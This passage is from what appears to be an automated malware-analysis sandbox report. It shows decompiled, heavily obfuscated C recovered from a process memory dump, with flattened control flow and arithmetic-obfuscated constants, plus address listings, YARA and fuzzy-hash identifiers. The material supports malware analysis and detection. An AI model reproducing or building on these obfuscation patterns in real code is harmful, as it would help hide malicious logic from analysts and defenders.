				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x24ca20; // 0x0
							_t260 = E00241B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0023F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00242674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00238736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x24ca20; // 0x0
						E002355D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x24ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0024838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00235F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}



















































                                                      0x00249b49
                                                      0x00249b53
                                                      0x00249b54
                                                      0x00249b5b
                                                      0x00249b5d
                                                      0x00249b5e
                                                      0x00249b5f
                                                      0x00249b64
                                                      0x00249b6c
                                                      0x00249b6f
                                                      0x00249b7b
                                                      0x00249b7d
                                                      0x00249b84
                                                      0x00249b87
                                                      0x00249b8b
                                                      0x00249b93
                                                      0x00249b9b
                                                      0x00249ba3
                                                      0x00249ba8
                                                      0x00249bb0
                                                      0x00249bb8
                                                      0x00249bc5
                                                      0x00249bc9
                                                      0x00249bd1
                                                      0x00249bd9
                                                      0x00249be1
                                                      0x00249be9
                                                      0x00249bf1
                                                      0x00249bf9
                                                      0x00249c01
                                                      0x00249c09
                                                      0x00249c11
                                                      0x00249c19
                                                      0x00249c21
                                                      0x00249c29
                                                      0x00249c2e
                                                      0x00249c36
                                                      0x00249c3e
                                                      0x00249c46
                                                      0x00249c4e
                                                      0x00249c56
                                                      0x00249c5e
                                                      0x00249c63
                                                      0x00249c6b
                                                      0x00249c73
                                                      0x00249c7b
                                                      0x00249c83
                                                      0x00249c87
                                                      0x00249c8f
                                                      0x00249c97
                                                      0x00249c9f
                                                      0x00249ca7
                                                      0x00249caf
                                                      0x00249cb7
                                                      0x00249cbc
                                                      0x00249cc4
                                                      0x00249cd4
                                                      0x00249cd8
                                                      0x00249ce0
                                                      0x00249ce8
                                                      0x00249cf0
                                                      0x00249cf5
                                                      0x00249cfd
                                                      0x00249d09
                                                      0x00249d0c
                                                      0x00249d10
                                                      0x00249d18
                                                      0x00249d20
                                                      0x00249d26
                                                      0x00249d2b
                                                      0x00249d33
                                                      0x00249d3b
                                                      0x00249d43
                                                      0x00249d4b
                                                      0x00249d5a
                                                      0x00249d5d
                                                      0x00249d61
                                                      0x00249d69
                                                      0x00249d71
                                                      0x00249d76
                                                      0x00249d7e
                                                      0x00249d86
                                                      0x00249d93
                                                      0x00249d97
                                                      0x00249d9f
                                                      0x00249da7
                                                      0x00249daf
                                                      0x00249db7
                                                      0x00249dbf
                                                      0x00249dc7
                                                      0x00249dcc
                                                      0x00249dd4
                                                      0x00249de4
                                                      0x00249de8
                                                      0x00249df0
                                                      0x00249df8
                                                      0x00249e04
                                                      0x00249e09
                                                      0x00249e0f
                                                      0x00249e14
                                                      0x00249e1c
                                                      0x00249e24
                                                      0x00249e2c
                                                      0x00249e31
                                                      0x00249e39
                                                      0x00249e3e
                                                      0x00249e46
                                                      0x00249e4e
                                                      0x00249e56
                                                      0x00249e5e
                                                      0x00249e66
                                                      0x00249e72
                                                      0x00249e75
                                                      0x00249e7c
                                                      0x00249e85
                                                      0x00249e89
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00249e95
                                                      0x00249e95
                                                      0x00249e95
                                                      0x00249e9b
                                                      0x00000000
                                                      0x00000000
                                                      0x0024a010
                                                      0x0024a04c
                                                      0x0024a064
                                                      0x0024a069
                                                      0x0024a06e
                                                      0x0024a07a
                                                      0x0024a07f
                                                      0x0024a085
                                                      0x0024a0a5
                                                      0x0024a0ae
                                                      0x0024a0ae
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00000000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x0024a070
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00000000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x0024a018
                                                      0x0024a038
                                                      0x00000000
                                                      0x00000000
                                                      0x0024a03a
                                                      0x00000000
                                                      0x0024a03a
                                                      0x0024a020
                                                      0x0024a08e
                                                      0x0024a09e
                                                      0x0024a0a4
                                                      0x00000000
                                                      0x0024a08e
                                                      0x0024a028
                                                      0x00000000
                                                      0x00000000
                                                      0x0024a02a
                                                      0x0024a02a
                                                      0x00249ea1
                                                      0x00249ff8
                                                      0x00249ffd
                                                      0x0024a000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00000000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00249ead
                                                      0x00249f9c
                                                      0x00249fab
                                                      0x00249fac
                                                      0x00249fb0
                                                      0x00249fb5
                                                      0x00249fbb
                                                      0x00000000
                                                      0x00000000
                                                      0x00249fc1
                                                      0x00249fc3
                                                      0x00249fcb
                                                      0x00249fd2
                                                      0x00249fd5
                                                      0x00249fd9
                                                      0x00000000
                                                      0x00249fd9
                                                      0x00249eb9
                                                      0x00249f8c
                                                      0x00000000
                                                      0x00249f8c
                                                      0x00249ec5
                                                      0x00249f42
                                                      0x00249f6f
                                                      0x00249f74
                                                      0x00249f79
                                                      0x00249f81
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00000000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00249ecd
                                                      0x00249efb
                                                      0x00249f00
                                                      0x00249f01
                                                      0x00249f24
                                                      0x00249f2b
                                                      0x00249f31
                                                      0x00249f34
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00000000
                                                      0x00249e91
                                                      0x00249e91
                                                      0x00249ed5
                                                      0x00000000
                                                      0x00000000
                                                      0x00249eeb
                                                      0x00249eec
                                                      0x00249eed
                                                      0x00249ef4
                                                      0x00249ef4

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                                      • API String ID: 0-2997250437
                                                      • Opcode ID: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
                                                      • Instruction ID: b770be84f8ab8d780115132cb48938af94692ef6a282f138e8c9790206cca724
                                                      • Opcode Fuzzy Hash: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
                                                      • Instruction Fuzzy Hash: D3D144711187418FE768CF65C48991FBBE1FB84708F208A1DF596862A0D7BAC959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002412E2, Relevance: 10.2, Strings: 8, Instructions: 239COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 95%
                                                      			E002412E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0023B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002328CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00235AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0024A889(_v1068, _v1064,  &_v1040);
							E00232BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00237B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x24ca2c; // 0x698300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0024889D(0x24c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x24ca2c; // 0x698300
						_t197 = _t293 + 0x230; // 0x7a0043
						E0023C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x24ca2c, _t257,  &_v520);
						_t256 = E00242025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002463C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}














































                                                      0x002412e2
                                                      0x002412e8
                                                      0x002412ef
                                                      0x002412f4
                                                      0x002412f9
                                                      0x00241301
                                                      0x00241309
                                                      0x00241311
                                                      0x00241319
                                                      0x00241321
                                                      0x00241332
                                                      0x0024133c
                                                      0x00241341
                                                      0x00241347
                                                      0x0024134f
                                                      0x00241357
                                                      0x0024135f
                                                      0x00241367
                                                      0x0024136f
                                                      0x00241377
                                                      0x0024137f
                                                      0x0024138b
                                                      0x00241390
                                                      0x00241396
                                                      0x0024139e
                                                      0x002413a6
                                                      0x002413ab
                                                      0x002413b3
                                                      0x002413bb
                                                      0x002413c0
                                                      0x002413c5
                                                      0x002413c6
                                                      0x002413ca
                                                      0x002413d2
                                                      0x002413da
                                                      0x002413e2
                                                      0x002413e7
                                                      0x002413ef
                                                      0x002413fc
                                                      0x00241400
                                                      0x00241405
                                                      0x0024140d
                                                      0x00241415
                                                      0x0024141a
                                                      0x00241422
                                                      0x0024142a
                                                      0x00241432
                                                      0x0024143a
                                                      0x00241442
                                                      0x0024144a
                                                      0x00241457
                                                      0x0024145b
                                                      0x00241463
                                                      0x00241471
                                                      0x00241475
                                                      0x0024147d
                                                      0x00241485
                                                      0x0024148a
                                                      0x00241492
                                                      0x0024149a
                                                      0x002414a2
                                                      0x002414aa
                                                      0x002414b2
                                                      0x002414c3
                                                      0x002414d0
                                                      0x002414d9
                                                      0x002414e1
                                                      0x002414e9
                                                      0x002414f9
                                                      0x002414fd
                                                      0x00241505
                                                      0x00241509
                                                      0x0024150e
                                                      0x00241514
                                                      0x0024151c
                                                      0x00241524
                                                      0x0024152d
                                                      0x00241532
                                                      0x00241538
                                                      0x00241540
                                                      0x00241548
                                                      0x00241550
                                                      0x0024155d
                                                      0x0024155e
                                                      0x00241562
                                                      0x0024156a
                                                      0x00241572
                                                      0x00241580
                                                      0x00241584
                                                      0x0024158c
                                                      0x00241594
                                                      0x0024159c
                                                      0x002415a0
                                                      0x002415a5
                                                      0x002415ad
                                                      0x002415b5
                                                      0x002415bd
                                                      0x002415c5
                                                      0x002415cd
                                                      0x002415d5
                                                      0x002415dd
                                                      0x002415e5
                                                      0x002415ed
                                                      0x002415f5
                                                      0x002415fd
                                                      0x002415fd
                                                      0x00241607
                                                      0x00241713
                                                      0x00241718
                                                      0x00000000
                                                      0x00241718
                                                      0x00241613
                                                      0x00241747
                                                      0x00241750
                                                      0x00241752
                                                      0x00000000
                                                      0x00241767
                                                      0x0024161f
                                                      0x002416b9
                                                      0x002416bf
                                                      0x002416e0
                                                      0x002416f0
                                                      0x002416f4
                                                      0x002416fc
                                                      0x002416fd
                                                      0x00241702
                                                      0x00241705
                                                      0x00000000
                                                      0x00241705
                                                      0x0024162b
                                                      0x0024169b
                                                      0x002416a2
                                                      0x002416a9
                                                      0x00000000
                                                      0x002416a9
                                                      0x0024162d
                                                      0x0024162f
                                                      0x00000000
                                                      0x00000000
                                                      0x00241635
                                                      0x00241642
                                                      0x00241647
                                                      0x00241659
                                                      0x00241666
                                                      0x00241670
                                                      0x00241676
                                                      0x00241689
                                                      0x0024168e
                                                      0x00241691
                                                      0x00241691
                                                      0x00241723
                                                      0x00241728
                                                      0x0024172a
                                                      0x0024172a
                                                      0x0024172a
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: m $+$IP$j_$k$ld8$n2$B
                                                      • API String ID: 0-4100556268
                                                      • Opcode ID: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
                                                      • Instruction ID: f8848a3a498781ad9b59e7d261633128442ec20ca07ce664e7f08bb3bf3bca88
                                                      • Opcode Fuzzy Hash: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
                                                      • Instruction Fuzzy Hash: 21B13F71118381DFD368CF26C58991BBBF1BBC4758F508A1EF1969A2A0C7B48A59CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023B75F, Relevance: 10.2, Strings: 8, Instructions: 223COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0023B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0023E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0024889D(0x24c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00243EB3(_v52, _t241, _t218, _v76, _v56, 0x24c9d0, _v80, _v28, 0x24c9d0, _v84, 0x24c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00242025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002365A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x24ca2c; // 0x698300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}










































                                                      0x0023b75f
                                                      0x0023b762
                                                      0x0023b76c
                                                      0x0023b776
                                                      0x0023b77e
                                                      0x0023b786
                                                      0x0023b78e
                                                      0x0023b793
                                                      0x0023b798
                                                      0x0023b7a0
                                                      0x0023b7a7
                                                      0x0023b7ae
                                                      0x0023b7b2
                                                      0x0023b7be
                                                      0x0023b7c2
                                                      0x0023b7c7
                                                      0x0023b7cf
                                                      0x0023b7d7
                                                      0x0023b7df
                                                      0x0023b7e7
                                                      0x0023b7f6
                                                      0x0023b7f9
                                                      0x0023b805
                                                      0x0023b809
                                                      0x0023b811
                                                      0x0023b819
                                                      0x0023b826
                                                      0x0023b829
                                                      0x0023b82d
                                                      0x0023b835
